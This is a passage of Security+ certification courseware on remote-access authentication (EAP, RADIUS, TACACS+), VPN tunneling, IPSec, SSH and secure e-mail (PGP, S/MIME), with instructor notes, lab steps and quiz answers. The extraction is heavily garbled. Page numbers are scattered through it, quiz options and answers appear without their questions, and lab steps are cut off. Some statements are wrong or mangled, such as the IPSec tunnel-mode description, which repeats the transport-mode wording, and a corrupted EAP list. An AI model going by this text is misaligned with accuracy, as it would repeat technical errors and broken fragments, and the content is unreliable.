CompTIA Security+ Certification There are several forms of EAP offering different levels of security and support for wired and wireless LANs: EAP over IP (EAPoIP) EAP over LAN (EAPOL) Message Digest Algorithm/Challenge-Handshake Authentication Protocol (EAP-MD5-CHAP) Transport Layer Security (EAP-TLS) Tunneled Transport Layer Security (EAP-TTLS) RADIUS Light Extensible Authentication Protocol 9 (LEAP) Cisco IEEE 802.1X conversation Depending on the version of EAP running, the authentication exchange will vary. The following exchange describes a wireless LAN using 802.1X: 1 A client (known as the supplicant) tries to connect to a wireless access point (known as the authenticator). 2 The access point (authenticator) detects the client and enables the clients port. It forces the port into an unauthorized state, so only 802.1X traffic is forwarded. All other traffic, such as HTTP, DHCP, and POP3 packets are blocked. 3 The supplicant sends an EAP-start message. 4 The authenticator sends an EAP-request identity message requesting the users identity. 5 The supplicant sends the identity to the authenticator. 6 The authenticator forwards the identity to the authentication server. The authentication server might use RADIUS, although 802.1X does not specify it. 7 The authentication server authenticates the user. The result is either an accept or a reject packet. 8 The authentication server returns the result to the authenticator. 9 Upon receiving the accept packet, the authenticator opens the clients port for other types of traffic. 10 At logoff, the client sends an EAP-logoff message. This forces the access point to transition the client port to an unauthorized state. Exhibit 4-1 uses a RADIUS server as an example.
Remote access
47
Exhibit 4-1: IEEE 802.1X conversation For information on the latest developments on IEEE standards, visit the following Web site:
http://www.ieee.org
48
Do it!
B-1:
Extended Authorization Protocol Extended Authentication Protocol Extensible Authentication Protocol Extensible Administrative Protocol
Supplicant, authenticator, authenticating server RADIUS client, authenticator, authenticating server Supplicant, RADIUS server, authenticating server Supplicant, ISP, authenticator
B C D
Remote access
49
410
CompTIA Security+ Certification 8 After this information is received by the NAS, it enables the necessary configuration to deliver the right network services to the user. This process is shown in Exhibit 4-2.
Exhibit 4-2: RADIUS Benefits The distributed approach to network security provides a number of benefits: Greater security The RADIUS client/server architecture allows all security information to be located in a single, central database, instead of scattered around a network in several different devices. A single UNIX system running RADIUS is much easier to secure and manage than several communications servers located throughout a network. Scalable architecture RADIUS creates a single, centrally located database of users and available services, a feature particularly important for networks that include large modem banks and more than one remote communications server. The RADIUS server manages the authentication of the user and the access to services from one location. Any device that supports RADIUS can be a RADIUS client, so a remote user can gain access to the same services from any communications server communicating with the RADIUS server. Open protocols RADIUS is fully open, is distributed in source code format, and can be adapted to work with systems and protocols already in use. This feature potentially saves tremendous amounts of time by allowing organizations to modify the RADIUS server to fit their network rather than rework their network to incorporate the NAS. RADIUS can be modified for use with most security systems on the market and works with any communications device that supports the RADIUS client protocol. The RADIUS server has modifiable stubs which enable customers to customize it to run with most security technologies.
Remote access
411
Future enhancements As new security technology becomes available, the customer can take advantage of that security without waiting for added support to the NAS. The new technology need only be added to the RADIUS server by the customer or an outside resource. RADIUS also uses an extensible architecture, which means that as the type and complexity of service the NAS is required to deliver increases, RADIUS can be expanded to provide those services. Do it!
B-2:
VPN server Wireless access point Network access server Windows workstation
412
413
TACACS+ uses TCP for its transport (unlike RADIUS, which uses UDP). TCP offers several advantages over UDP, primarily a connection-oriented transmission. RADIUS uses UDP, so it requires additional functions such as retransmit attempts and time-outs to compensate for the connectionless transmission. Using TCP offers a separate acknowledgement that a request has been received within the network, regardless of how loaded or slow the authentication mechanism might be. It also provides immediate indication of a crashed server because acknowledgements would not be forthcoming. While RADIUS only encrypts the password in the packet that is passed from client to server, TACACS+ encrypts the entire body of the packet including username, authorized services, and other information. RADIUS combines the authentication and authorization packets, it is difficult to separate these functions. TACACS+ separates authentication, authorization, and accounting, which allows for separate authentication solutions: a user can logon using a Kerberos server for authentication and a TACACS+ server for authorization and accounting.
If students are not familiar with the protocols, you can briefly describe them.
Another advantage to using TACACS+ is that it offers multiple protocol support while RADIUS does not. Specifically, AppleTalk Remote Access, NetBIOS Frame Protocol Control, Novell Asynchronous Services Interface, and X.25 PAD connections cannot be supported by RADIUS. TACACS+ is able to support all of these protocols.
414
Do it!
B-3:
Heres how
1 Click Start 2 Right-click My Computer
Choose Manage 3 Expand Local Users and Groups Select Users 4 Double-click Administrator 5 Activate the Dial-in tab Select Allow access
Click OK 6 Double-click User1 and repeat step 5 7 Double-click User2 and repeat step 5 8 Close the Computer Management window
415
B-4:
C D
416
Types of VPNs
Explanation A virtual private network (VPN) is a tool that enables the secure transmission of data over unsecured networks, such as the Internet. Remote sites and users are able to access their network information as if using a private network (hence the name virtual private network) without the costs associated with long-distance calls or leased lines. A VPN uses security procedures and tunneling protocols to maintain privacy. Tunneling enables a foreign protocol to travel across a network by encapsulating (wrapping) it inside the packets of the host network. The security protocols supply an additional level of security by encrypting the data before transmission. There are two types of VPN commonly used in corporate networks: Site-to-site VPN Remote access VPN
Site-to-site VPN
Site-to-site VPNs allow a corporation to connect to branch offices or other companies over a public network. Each site requires a VPN gateway (dedicated hardware or a router running VPN server software) to connect to the Internet. The gateway-to-gateway architecture logically operates as a WAN, connecting offices through multiple private tunnels across the Internet. All locations must use identical encryption and encapsulation protocols and settingsPPTP, L2TP and IPSec are the most common. Each local area network connects to the Internet with a router. In order to receive incoming calls, the corporate hub router employs dedicated lines to permanently connect to a local ISP for incoming calls; branch offices might use either dedicated lines or dial-up. In both cases, the routers establish a secure tunnel across the Internet.
Remote access
417
Exhibit 4-4: Client-side tunneling An alternative to installing or configuring the client computer to initiate the necessary security communications is to outsource the VPN to a service provider. With this type of configuration, there is no need for the company to maintain client-side software or configurations. When implementing this type of solution, however, encryption does not happen until the data reaches the providers network.
418
CompTIA Security+ Certification This results in an unsecured connection from the users computer to the providers network access server, as shown in Exhibit 4-5. This also places the responsibility of protecting corporate access to information with an external entity.
Exhibit 4-5: Service provider tunneling In this scenario, remote users dial in to a service providers network or point of presence (POP) via a local or toll-free number. The service provider, in turn, initiates a secure encrypted tunnel to the corporate network. If security is of a high concern, this type of implementation might not be the best choice.
VPN drawbacks
Cost benefits and flexibility aside, using VPNs does have its problems. VPN devices are not completely fault tolerant although there are efforts underway to address this issue. In addition, there are diverse choices when implementing VPNs. Software solutions tend to have trouble processing the multitude of simultaneous connections that occur on a large network. This problem can be mitigated by using a hardware solution, but that requires a much higher cost. Its also important to remember there is no such thing as absolute security. As more security is added to a network, project costs increase, and simplicity suffers according to a law of diminishing returns each incremental increase in security over a certain point becomes more and more expensive. A proper balance in these issues must be determined and maintained. Do it!
C-1:
Heres how
This activity takes place only at Server-X.
To configure the server. The Routing and Remote Access Server Setup Wizard will begin.
Click Next
419
5 Select the network interface that connects this server to the Internet Click Next 6 Click Next 7 Click Next
To accept the default of automatically assigning IP addresses to remote clients To accept the default value of No, use Routing and Remote Access to authenticate connection requests. To start the Routing and Remote Access service. If prompted about configuring the DHCP Relay Agent.
420
Do it!
C-2:
Understanding VPNs
C
D
Remote access
421
Tunneling protocols
Explanation Tunneling hides or encapsulates the original packet inside a new packet. The new packet has new addressing and routing information, which enables it to travel across networks. When the new packet arrives at the destination network, the tunneling protocols are stripped away, exposing the original packet. Two commonly used tunneling protocols are Point-to-Point Tunneling Protocol (PPTP) and Layer Two Tunneling Protocol (L2TP). Point-to-Point Tunneling Protocol (PPTP) The Point-to-Point Tunneling Protocol (PPTP) protocol is built upon the wellestablished Internet protocols of PPP (Point-to-Point Protocol) and Transmission Control Protocol/Internet Protocol (TCP/IP). PPP provides authentication, encryption and compression of data sent over analog telephone lines. TCP/IP provides a transport mechanism for conveying digital data over the Internet infrastructure. When a user phones into an ISP to connect to the Internet, the data is sent to the ISP over a PPP connection but then repackaged for transport over the Internet. This process uses tunneling. In the case of data sent over phone lines, the original data packets are encapsulated within a PPP packet using Generic Routing Encapsulation Protocol version 2 (GRE v2). PPTP then encrypts and encapsulates the PPP packets within IP datagrams for transmission through the Internet. PPTP does much more than deliver messages. After a PPTP link has been established, it provides its users with a virtual node on the corporate LAN or WAN. PPTP uses Microsoft point-to-point encryption (MPPE) to encrypt the data packets, and an authentication protocol such as PAP or CHAP to verify users identities before granting access to the corporate network. PPTP employs TCP packets to perform status inquiry and signaling over the network. The control packets are transmitted over a separate control channel and perform the following tasks: Query the status of communications servers Provide in-band management Allocate channels and places outgoing calls Notify Windows NT/2000/Server 2003 servers of incoming calls Transmit and receive user data with bi-directional flow control Notify Windows NT/2000/Server 2003 servers of disconnected calls Assure data integrity, while making the most efficient use of network bandwidth by tightly coordinating the packet flow Layer Two Tunneling Protocol (L2TP) Layer Two Tunneling Protocol (L2TP) combines the best features of PPTP with the L2F protocol created by Cisco Systems to provide tunneling capabilities over IP, X.25, Frame Relay, and Asynchronous Transfer Mode (ATM) infrastructures. LT2P uses UDP to encapsulate PPP frames within L2TP headers as the tunneled data. As it has no native encryption capabilities, L2TP must rely on other encryption technologies, such as IPSec, to encrypt the data frames. Authentication is accomplished using TACACS+ or RADIUS.
422
IP Security protocol
IP Security Protocol (IPSec) is a suite of protocols used for encrypting data so it can travel securely over a public IP network. It uses OSI layer 3, the network layer, to send encrypted communications between two network devices. Its commonly used to secure VPN communications over an open network. IPSec protocols The IPSec protocol suite is made up of four separate protocols: Authentication Header (AH) protocol signs the data packets using MD5 or SHA1 hashes and a shared secret key. This guarantees authenticity. Encapsulating Security Payload (ESP) protocol encrypts the packet using a symmetric encryption algorithm (DES or 3DES) and shared secret key. This ensures confidentiality. IP Payload Compression Protocol (IPComp) compresses the data packet before transmission. When used in combination with ESP encryption, the compression is applied to the packet before encryption. Internet Key Exchange (IKE) provides an automated method for negotiating the shared secret keys. The protocols might be applied alone or in combination. IPSec encryption modes IPSec also offers two modes of encryption: transport and tunnel. Transport mode encrypts the data portion of each packet, but not the header. This mode is used in host-to-host (peer-to-peer) communications.data portion of each packet Tunnel mode encrypts the date portion of each packet, but not the header. Tunneling allows you to hide the source and destination addresses from hackers. This mode is used by VPN gateways. To use IPSec, both the sender and the recipient must be IPSec compliant.
423
To communicate using IPSec, the following steps must take place: 1 An administrator creates an IPSec policy. This contains a set of rules that define what types of traffic (for example, HTTP or FTP) require encryption and which encryption and/or authentications protocols to use. Each rule can specify multiple authentication methods. 2 The administrator distributes the IPSec policy to all targeted machines. 3 The two hosts automatically negotiate the authentication and encryption method to be used for communication. Which protocols are selected depends on the IPSec policy. 4 If the selected protocol requires negotiating secret keys, the IKE is employed. One of three methods is implemented: Both parties use a password known as a pre-shared key. The two parties swap a hashed version of the pre-shared key, and then attempt to recreate the hashed data. If successful, both parties can begin secure communications. Both parties exchange public keys that have been certified by a CA. Both parties use Kerberos v5 for authentication. 5 The IP packets are encrypted and/or signed according to the negotiated terms. All functions of IPSec remain transparent to the user.
Secure Shell
A secure shell (SSH) is a secure replacement for remote logon and file transfer programs such as Telnet and FTP, which transmit data in unencrypted text. SSH uses a public key authentication method to establish an encrypted and secure connection from the users machine to the remote machine. When the secure connection is established, then the username, password, and all other information is sent over this secure connection. SSH is becoming a standard for remote logon administration. It has become so popular there are many ports of SSH for various platforms, and there are free clients available to log on to an SSH server from many platforms as well. SSH Certifier is designed to be a widely applicable product, and it runs on a wide variety of different platforms including Windows, Linux, HP-UX and Solaris. In the enrollment process, the end-user requesting a certificate must be authenticated. If the entity has a valid certificate, the private key can be used for authentication when using certain enrollment protocols; however, the user does not typically possess a valid private key for the enrollment process. First-time authentication can be done either manually or by generating shared secrets for entities. When shared keys are delivered to end entities by secure means, the users can authenticate themselves during the online enrollment, and the request can be approved automatically, if the policy allows automatic acceptance. This method is especially useful in applications in which shared secrets can be delivered in the same package with the client software and certification authority certificate. If the enrollment protocol does not support shared secrets or they are just not used, authentication has to be done in an out-of-band way, such as by showing valid identity information for the operator. The operator can then make the approval decision manually.
Tell students that in SSH, public key authentication is used before a connection is established. Mention that SSH is rapidly replacing Telnet for remote administration of UNIX and Linux systems, and even some Windows systems.
424
CompTIA Security+ Certification The authentication requirements and the certificate templates for the certificate issuance are defined in the certification policy. The policy can be configured via the administration graphical user interface. The key components of an SSH product are the engine, the administration server, the enrollment gateway, and the publishing server. Each of these components can be placed either on separate machines or on a single machine. The engine receives certification requests from the enrollment gateway, makes policy decisions, and generates and signs certificates and Certificate Revocation Lists (CRLs). The engine also communicates with the administration server and performs the required database queries. The administration server is an HTTP server with a Transport layer security (TLS) implementation. The graphical user interface can be easily customized by modifying the HTML code, also by using the script tools of Certifier, the functionality of the GUI can be expanded. The enrollment gateway has the server-side implementations of the supported certificate enrollment protocols. It receives certificate requests from the enrollment clients and forwards them to the engine for policy decisions. The enrollment gateway also sends confirmation messages and issues certificates to end entities. The issued certificates and CRLs are sent to the publishing server, which performs the LDAP publishing in the directory. For more information on IPSec and SSH, visit www.ssh.com.
Do it!
C-3: Using PPTP to connect to a VPN server Heres how Heres why
1 On Server-Y, click Start 2 Choose Control Panel,
Network Connections, New Connection Wizard
Students will perform this activity in pairs on ServerX and Server-Y as indicated in the activity steps. If students are prompted to provide Location information, tell them to enter an area code and click OK twice.
Remote access 7 Enter the IP address of the VPN server (Server-X) Click Next 8 Select Anyone's use Click Next 9 Check Add a shortcut to this
connection to my desktop
425
If you don't know Server-X's IP address, have your partner open a Command window, enter ipconfig and note the server's IP address.
You are prompted to log on. You are now connected to Server-X. To configure the Administrator account to require a remote access policy for access. Activate the Dial-in tab in the Properties of the Administrator user to see the option.
14 At Server-Y, disconnect the Class VPN PPTP connection and try to connect again 15 Close all windows
The connection is denied because an appropriate remote access policy has not been configured.
426
Do it!
C-4:
2 Data sent from a dial-up modem is encapsulated within a(n) _______ packet.
A
B C D
4 LT2P uses UDP to encapsulate PPP frames with L2TP headers. True or false?
True
7 Which protocol uses the IKE public key system to certify and sign data packets?
Authentication header
8 Which protocol uses symmetric encryption to encrypt the IP payload for confidentiality?
Encapsulating security payload
Remote access
427
Telecommuting
Explanation Many large companies have begun using remote access technologies as a method to reduce costs and improve employee satisfaction. The benefits gained by telecommuting must be carefully weighed against the increased vulnerabilities. In the telecommuting model, the home office is arguably not trusted. The lack of physical access control would indicate that no matter how trusted a computer is when first configured, after spending time at a users home, the state of a machine is in question.
Security issues
Although VPNs and encryption are powerful tools, they do not protect against all threats. Misconfigured firewalls, unrestricted physical access, weak encryption, and sporadic auditing leave the remote PC an easy target for attackers. Split tunneling The simplest VPN configuration consists of a VPN client computer with an Internet connection. This setup can introduce a major risk called split tunneling. Split tunneling allows a remote PC to surf the Web and access the corporate VPN simultaneously. The benefit of split tunneling is that corporations can conserve bandwidth needed for Internet access at VPN hub sites and reduce the load on VPN gateways. The drawback is that, if a remote PC is connected directly to the Web and at the same time tied into the VPN, attackers coming on from the Web could commandeer the PC and gain access to the corporate network. The integrity of the remote PC can just as easily be compromised while the user is Web surfing with the VPN tunnel turned off. Viruses or back doors downloaded while surfing would threaten the VPN the next time it is connected. Unsecured data files As telecommuters download data files to their home PCs, all safeguards implemented at the corporate office to protect sensitive information are negated. The central office has legally lost control over that data. With limited physical protection, hackers can steal portable computers or hard drives and, given enough time, break any security in place. The attacker can gain access to corporate data and, potentially, the corporate network.
428
CompTIA Security+ Certification Compromised certificates Many IT professionals use digital certificates to add a layer of security to their VPN clients. In the context of a computer system in an uncontrolled environment, the certificate can be more vulnerable than traditional password authentication. The attacker can easily crack a weak pass-phrase using brute force. Once compromised, the certificate could be used to authenticate the attacker to the central office and even other businesses. Unlike passwords that change regularly, certificate pass-phrases can be valid for a year or more. War dialing War dialing refers to calling a block of numbers randomly until a modem answers. If the attacker finds a modem, he might use it to dial into another network to avoid longdistance charges or to mask his identity during an attack. Limited accounting Another issue concerning remote access is the lack of auditing. A record of security, system, and application events only exists on the compromised system, a serious violation of the standard for event logging. The moment the VPN link is terminated, the remote computers state cannot be guaranteed. Misconfigured firewalls Home systems connected to the Internet through broadband or cable modem are sharing a bus with other computers in the neighborhood. This provides many opportunities for an attacker to send and receive data undetected. As long as the computer is on, its subject to attack. In addition, personal firewalls provide a false sense of security: when misconfigured, they are ineffective in protecting the system against eavesdroppers and hackers.
Solutions
The following recommendations will protect the remote PC against most threats: Install a personal firewall at the remote PC. Filter both incoming and outgoing packets. Configure Web browsers to limit browser plugins, such as ActiveX and Javascript. Make sure PC operating systems and applications have updated security patches. Use virus-scanning software and update it religiously. Set it to scan incoming email and attachments. Disable cookies to prevent monitoring of browser habits. Use strong passwords. Encrypt sensitive and critical information. One very effective solution that circumvents all the above precautions is to provide the employee with a remote session (or thin-client) solution. This eliminates the issue of storing data on the remote computer. Thin clients have no local storage or functionality beyond connecting to a remote session server. When the connection to the central office is broken, the data stays safely at the central office.
Remote access
429
D-1:
Heres how
For this activity, students will work in pairs. Each partnership will use two machines, Server-X and Server-Y. Instruct students to substitute their servers hostname for Server-X and their partners server hostname for Server-Y.
Choose
New Remote Access Policy
Click Next 6 Click Next 7 Select User Click Next 8 Click Next 9 Click Next 10 Click Finish 11 Double-click Remote Access
Policies You'll see the Allow all users access policy in the right pane. To display the Properties of the remote access policy. Remote access policies are configured to deny rather than grant access by default. To save your changes. To accept the default authentication method. To accept the default Policy Encryption Level. To accept the default access method of VPN.
Click OK
430
CompTIA Security+ Certification 14 Close the Routing and Remote Access window 15 Open Computer
Management Windows Server 2003 does not allow dial-in access by default. In order to allow remote access to a Windows Server 2003 server, you must configure the Remote Access Permissions on a user-by-user basis. Administrator is an exception to this rule; Administrator is allowed to connect remotely by default.
16 Expand
Local Users and Groups
Select Users 17 Double-click User1 18 Activate the Dial-in tab 19 Select Control access
through Remote Access Policy To change the dial-in access for User1.
Click OK 20 Repeat steps 17 through 19 for User2 21 Log on to Server-Y as User1 and try to access the Class VPN PPTP connection 22 On Server-X, click Start Choose Administrative Tools, Routing and Remote
Access Youll be able to connect using the remote access policy.
Remote access
431
Topic B
Topic C
Topic D
Review questions
1 PPTP is built upon _______ and ________, two well-established communications protocols. A PPP, UDP
B
PPP, TCP/IP
C LDAP, PPP D TCP/IP, UDP 2 SSH uses a _____________ key authentication method to establish a secure connection. A Private
B
Public
C Encrypted D Skeleton 3 The RADIUS architecture allows all information to be located on a single central database. True or false?
True
432
CompTIA Security+ Certification 4 _____________ is an authentication method that was developed to address scalability and connection-oriented services. A 802.1X B RADIUS C X.25
D
TACACS+
5 IPSec uses a(n) ______________ algorithm for negotiating which keys to use for symmetric encryption.
A
Asymmetric
B Symmetric C Proprietry D Encryption 6 What are the available PPTP protocol enhancements? (Choose all that apply.) A PPP is multiprotocol B Offers authentication C Offers methods of privacy and compression of data
D
B Authentication, authorization, and availability C Authorization, accounting, and availability D Authentication, accounting, and availability 9 The acronym NAS stands for network authentications server. True or false?
False: It means network access server.
10 Remote access logging can log which of the following events? A Accounting requests B Authentication requests C Periodic status
D
51
Unit 5 E-mail
Unit time: 120 minutes Complete this unit, and youll know how to:
A Define secure e-mail and how it works. B Describe the characteristics of PGP and
S/MIME.
C Identify and safeguard against e-mail
vulnerabilities.
52
E-mail
Explanation Over the course of the past decade, electronic mail has become the mission-critical business application and changed the way we work forever. The result has been a massive increase in productivity; however, e-mail is an incredibly vulnerable tool. For the most part, it is transmitted across the Internet in plaintext so any intermediary could read or modify it, and worse, anyone could set up an e-mail account and claim to be that person. E-mail security is not the only challenge to maintaining the utility and productivity gains offered by e-mail. Floods of spam, or unrequested junk mail, are another hazard that workers in the new digital office must navigate. Hoaxes further threaten to reduce worker productivity and create chaos on the corporate network. The technologies presented in this unit, Pretty Good Privacy (PGP) and Secure/Multipurpose Internet Mail Extension (S/MIME), seek to ensure the integrity and privacy of information by wrapping security measures around the e-mail data itself. These two competing standards use public key encryption techniques.
53
Authentication Secure e-mail uses secret encryption keys that only the owners know and have access to, so the recipient of the e-mail knows for a fact that it was sent by the person it purports to be from. Nonrepudiation Just as with authentication, the recipient of the message knows for a fact that the message was sent by the person appearing in the messages FROM: field, and that the details of the message body were received as they were written. The sender cannot claim the message did not originate from his or her computer or the contents of the message were changed in transit.
Terminology
The key cryptography concepts you need to understand are encryption, digital signatures, and digital certificates. These concepts are covered briefly in this section so you can recognize how they are used to make e-mail more secure.
Inform the students that, although most of the key terms and concepts relating to cryptography are explained in this unit, they are covered in depth in the Cryptography unit.
Encryption
When people think of secure e-mail, encryption is the technology that comes to mind. Encryption provides privacy, integrity, authentication, and nonrepudiation. These are the primary features of secure e-mail:
Exhibit 5-1: How conventional encryption works Encryption is the conversion of data into code to make it unreadable, as shown in Exhibit 5-1. It is accomplished by taking data and passing it, along with a value, called a key, through an algorithm that makes the data completely unreadable. The only way to recover the information is to reverse the process using the appropriate key. Even though the encryption algorithm is known, without also having the key, it is impossible to recover the original data. The two main types of encryption are; conventional cryptography, in which the same key is used for encryption and decryption, and public key cryptography, which uses a publicly distributed key for encryption and a secret private key for decryption.
54
Hash function
A hash function is a function that takes plaintext data of any length and creates a unique fixed-length output. For example, the message could be 1 KB or 1 MB in size, but the hash output on either message would be the same fixed length. The result of the hash function is called a message digest. The essential principle of a cryptologically sound hash function is that if the input were changed by a single bit, the message digest would be different. Its also important to remember that the original message cannot be derived from the message digest; hash functions work only in one direction. Two major hash functions are used today. SHA-1 (Secure Hash Algorithm 1) was developed by the National Security Agency (NSA) and is considered the more secure of the two commonly used algorithms. It produces 160-bit digests.
Information about breaking MD5 can be found at scramdisk.clara.net/ pgpfaq.html #SubMD5Implic.
The other common hash algorithm is MD5 (Message Digest algorithm version 5), which produces 128-bit digests. RSA Security has placed MD5 in the public domain; therefore, no licensing is required to use it. Cryptography experts have shown that MD5 has major flaws, and it is likely that it will be broken in the future.
Do it!
A-1:
2 A message digest is the product of running a message through a hash function. True or false?
True
3 Once data is encrypted, the only way to recover the information is to _____. A B C
D
Attach a digital certificate Share the private key Pass it through a hash function Reverse the process using the appropriate key
4 The hash function is a good method for determining whether a message has been altered. True or false?
True
5 A hash function takes plaintext and creates a fixed-length output regardless of the size of the message. True or false?
True
55
Digital signatures
Explanation A digital signature is a digital code that can be attached to an electronic message to uniquely identify the sender. Digital signatures provide integrity, authentication, and nonrepudiation. That is, by using a digital signature, a user can receive a plaintext message and still know with a high degree of certainty that the message has not been tampered with, and indeed comes from the person it claims to be from with no possibility the sender could truthfully deny sending the message. Digital signatures are created using hash functions. You perform a hash on the message to create a message digest, and then you sign the message by encrypting the message digest with your own private key, as shown in Exhibit 5-2.
Exhibit 5-2: How digital signatures are created When the receiver gets the message, that person can verify its integrity: the message digest is recreated by performing a hash on the message using the same hashing algorithm as the sender. The message digest is then compared against the digest that came with the message (after decrypting it with the senders public key). If the two versions of the digest are the same, then the message has not been altered. The fact that the receiver can recover the original message digest using the senders public key guarantees its authenticity and provides nonrepudiation.
56
Digital certificates
A digital certificate is an attachment to an electronic message used for security purposes. It provides a type of credential, much like a passport or drivers license. Digital certificates are similar to digital signatures in that a public key and private key are used, but with digital certificates, there is an endorser who vouches for the authenticity and identity of the public key holder. The digital certificate contains the following information: The owners public key, which is used to encrypt messages to its owner One or more pieces of information that uniquely identify the owner (for example, a name and e-mail address) The digital signature of an endorser (called the Certificate Authority), stating that the public key actually belongs to the person in question Exhibit 5-3 shows the structure of one major digital certificate standard, the X.509 certificate.
Exhibit 5-3: A digital certificate Much like a real certificate, a digital certificate helps others to verify the owner of the public key is who he says he is. This is a valuable addition to the normal features of encryption. Digital certificates are designed to answer the question of whom an e-mail address and public key really belong to; you dont know, unless the sender has a digital certificate and you trust the authority that signed the certificate. In the real world, you might rely on a passport to authoritatively identify the person who carries it, but only because you trust the government to issue the passport only to the right person. The same can be said for digital certificates: the certificate is only as good as your trust for the authority that issued it.
57
Exhibit 5-4: How public key encryption works The private key is used for decryption and is kept secret. The public key is used for encryption and is freely distributed. For example, Marys public key is the only key that anyone needs to encrypt a message to her. Once a message has been encrypted using Marys public key, it can only be decrypted with her private key. Not even the sender can decrypt the message once its been encrypted with Marys public key. So key distribution is not an issue with public key technologybut the actual process of encrypting is much, much slower.
58
Do it!
A-2:
4 1 3 2 5
Conventional cryptography Traditional cryptography Public key cryptography Private key cryptography
B C D
3 Which of the following uses one key to encrypt and another to decrypt? A B
C
Conventional cryptography Traditional cryptography Public key cryptography Private key cryptography
The owners public key One or more pieces of information that uniquely identify the owner The digital signature of an endorser All of the above
59
6 A hash function takes plaintext and creates a fixed-length output regardless of the size of the message. True or false?
True
C D
510
511
512
Do it!
A-3:
2 S/MIME compresses plaintext using ZIP compression before encrypting the message. True or false?
False: PGP compresses the plaintext first.
5 The plain text message is encrypted using the public key to create cipher text. True or false?
False: The plain text message is encrypted using the session key.
6 How is the session key protected during transmission over the Internet?
The session key is encrypted using the recipients public key.
7 The encrypted session key is sent in a separate message from the cipher text. True or false?
False: It is sent with the cipher text.
8 The session key is decrypted using the recipients private key. True or false?
True
513
Background on PGP
Explanation PGP and S/MIME both use encryption and digital signatures to achieve the goal of secure e-mail, however, their formats and implementations are significantly different. PGP establishes authenticity through a Web of trust and places the responsibility of authentication on each user. S/MIME uses a Certificate Authority (CA) to establish trust. The two protocols are incompatible. PGP is an encryption technology that has grown up with the Internet. PGP was originally written by Phil Zimmerman in 1991 to fill the gap in effective, commercially available encryption software. PGP supports four major symmetric encryption methods: CAST An algorithm for symmetric encryption named after its designers (Carlisle Adams and Stafford Tavares). CAST is owned by Nortel, but available to anyone on a royalty-free basis. CAST is a fast method of encrypting data and has stood up to attempted cryptanalytic attacks. Cast uses a 128-bit key and has no weak or semi-weak keys. International Data Encryption Algorithm (IDEA) Originally published in 1992, IDEA has a decent record of withstanding attacks, and however, the fact that the algorithm must be licensed from Ascom Systec has impeded its adoption. IDEA uses a 128-bit key. Triple Data Encryption Standard (3DES) Based on the DES, which uses a 56bit key, 3DES runs the same algorithm three times to overcome its short key size. Although (3 x 56) bits equals 168 bits, the effective key strength of 3DES is approximately 129 bits. 3DES is perhaps the industry standard algorithm for encryption. 3DES is much slower than either IDEA or CAST. Twofish One of five algorithms that were finalists to be selected for the Advanced Encryption Standard (AES), Twofish was selected for inclusion into PGP before the winner was announced in 2001. Although Twofish was not ultimately selected to be used in the standard, it is a strong algorithm that has withstood examinations by industry experts. Like all AES contestants, Twofish has 128-bit, 192-bit, and 256-bit key sizes.
514
CompTIA Security+ Certification PGP certificates PGP defines its own standard for digital certificates. PGP certificates are very similar to X.509 certificates in some respects but are notably more flexible and extensible. One unique aspect of the PGP certificate format is that a single certificate can contain multiple signatures. Several or many people might sign the key/identification pair to attest to their own assurance that the public key definitely belongs to the specified owner. If you look on a public certificate server, you might notice certain certificates, such as that of PGPs creator, Phil Zimmermann, contain many signatures. The table below provides an outline of the PGP certificate format.
Certificate PGP version number Certificate format Version of PGP, which was used to create the key associated with the certificate. Public portion of your key pair, together with the algorithm of the key, which is RSA, RSA Legacy, Diffie-Hellman or Digital Signature Algorithm (DSA). Identity information about the user, such as his or her name, user ID, e-mail address, ICQ number, photograph, and so on. Signature created with the private key corresponding to the public key associated with this certificate. Start date/time and expiration date/timeindicates when the certificate will expire. Encryption algorithm to which the certificate owner prefers to have information encrypted; the supported algorithms are CAST, IDEA, 3DES, and Twofish.
E-mail Do it!
515
Offers 128-bit, 192-bit, and 256-bit keys and included in PGP in 2001 Uses a 128-bit key and available to anyone on a royalty-free basis Uses a 56-bit key but runs the same algorithm three times to produce an effective key strength of 129 bits Uses a 128-bit key and is licensed by Ascom Systec
IDEA
2 One unique aspect of the PGP certificate format is that a single certificate can contain: A
B
C D
3 Which of the following is contained within a PGP certificate? (Choose all that apply.)
A
PGP version number Certificate holders private key Certificate holders information Digital signature of the certificate owner Preferred symmetric encryption algorithm for the key
B
C D E
516
Background on S/MIME
Explanation S/MIME is a protocol for secure electronic mail and was designed to add security to email messages in MIME format. The security services offered are authentication (using digital signatures) and privacy (using encryption). S/MIME v3 was made a standard in July, 1999, by IETFs S/MIME Working Group. The S/MIME v3 standard consists of six parts: Diffie-Hellman Key Agreement Method (RFC 2631) S/MIME Version 3 Certificate Handling (RFC 2632) S/MIME Version 3 Message Specification (RFC 2633) Enhanced Security Services for S/MIME (RFC 2634) Cryptographic Message Syntax (RFC 3369) Cryptographic Message Syntax (CMS) Algorithms (RFC 3370) S/MIME encryption algorithms S/MIME development began in 1995, and because of the specification needed to work within U.S. government export controls which existed until recently, S/MIME implementations have been required to support 40-bit RC2 (Rivest Cipher 2, a symmetric encryption cipher owned by RSA Data Security), which is known to be a very weak algorithm. Although 3DES is also a supported algorithm, and is in fact recommended, some have criticized S/MIME for being cryptographically weak, but it is only weak if a weak algorithm is chosen. The specification is very clear on the subject. Forty-bit encryption is considered weak by most cryptographers. Using weak cryptography in S/MIME offers little actual security over sending plaintext, however, other features of S/MIME, such as the specification of 3DES and the ability to announce stronger cryptographic capabilities to parties with whom you communicate, allows senders to create messages that use strong encryption. (RFC 2633, page 24) S/MIME recommends three symmetric encryption algorithms: DES, 3DES, and RC2. The adjustable key size of the RC2 algorithm makes it useful for applications intended for export outside the U.S. In some environments, hiding the identity of the sender is a requirement. This is in an effort to prevent traffic analysis, where an eavesdropper could gain valuable information on the communicants even if the message cannot be read. To thwart this, these environments use anonymous e-mailers or gateways that strip off the originating e-mail address. A digital signature could give the eavesdropper another piece of data to identify the sender, who is also the signer. S/MIME prevents this by applying the digital signature first, and then enclosing the signature and the original message in an encrypted digital envelope. In this way, no signature information is exposed to the eavesdropper. X.509 certificates Rather than define its own certificate type as PGP does, S/MIME relies on the X.509 certificate standard. To obtain an X.509 certificate, you must ask a certificate authority (CA) to issue one. You provide your public key, proof that you possess the corresponding private key, and some specific information about yourself. You then digitally sign the information and send the whole packagethe certificate requestto the CA. The CA then performs some due diligence in verifying the information you provided is correct and, if so, generates the certificate and returns it.
517
You might think of an X.509 certificate as looking like a standard paper certificate (similar to one you might have received for completing a class in basic first aid) with a public key taped to it. It has your name and some information about you on it, plus the signature of the person who issued it to you. For an outline of the contents of X.509 certificates, see the table below:
